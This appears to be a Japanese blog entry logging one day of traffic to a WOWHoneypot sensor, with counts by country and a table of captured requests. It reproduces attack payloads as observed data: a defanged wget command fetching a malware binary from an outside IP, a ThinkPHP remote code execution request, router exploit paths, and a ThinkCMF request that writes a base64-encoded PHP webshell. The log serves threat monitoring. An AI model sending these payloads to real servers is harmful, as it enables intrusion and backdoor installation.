WOWHoneypot観察(223日目)
2019/10/25(金)
トータルは6082件でした。
ハンティングログは以下です。
49.207.5[.]243 wget+hxxp[:]//107.160.244[.]6/lx/z3hir[.]mpsl |
IPのロケーション別の件数は以下です。
アメリカ | 4014 |
ブラジル | 2009 |
中国 | 12 |
インド | 9 |
オランダ | 8 |
ドイツ | 3 |
ポーランド | 3 |
ウクライナ | 3 |
イタリア | 3 |
イラン | 3 |
トルコ | 2 |
メキシコ | 2 |
日本 | 2 |
アルゼンチン | 1 |
シンガポール | 1 |
ナイジェリア | 1 |
イラク | 1 |
スペイン | 1 |
ロシア | 1 |
イスラエル | 1 |
オーストラリア | 1 |
エジプト | 1 |
件数 | 概要 | リクエスト |
---|---|---|
6007 | Tomcat管理ページに対するブルートフォース攻撃 | GET /manager/html |
48 | アクセス | GET / |
6 | Linksys ルータの E シリーズの脆弱性を狙った通信 | POST /tmUnblock.cgi |
3 | ThinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php |
2 | ThinkPHPの脆弱性を狙った通信 | POST /TP/public/index.php?s=captcha |
2 | ThinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 |
2 | Spring Data Commonsの脆弱性を狙った通信 | POST /users?page=&size=5 |
2 | DVR/NVR/IPC のAPIにおける脆弱性を狙った通信 | POST /editBlackAndWhiteList |
2 | 調査 | HEAD / |
2 | phpMyAdminの調査 | GET /admin-scripts.asp |
1 | ページ調査 | POST /pagefile.php |
1 | DASAN Network Solutionsのホームルーターを狙った通信 | POST /GponForm/diag_Form?images/ |
1 | 不明 | GET /servlet?m=mod_listener&p=login&q=loginForm&jumpto=status |
1 | ThinkCMFの脆弱性を狙ったと思われる通信? | GET /?a=fetch&templateFile=public/inde&prefix=%27%27&content=%3Cphp%3Efile_put_contents(%27pagefile.php%27,base64_decode('PD9waHAgcHJlZ19yZXBsYWNlKCcvW2Vycm9ycGFnZV0vZScsQHN0cl9yb3QxMygnQG5mZnJlZygkX0NCRkdbY250cl0pOycpLCdzYWZ0Jyk7Pz4='))%3C/php%3E |
1 | 不正中継の試み | CONNECT www.google.com:443 |
1 | 不正中継の試み | CONNECT www.baidu.com:443 |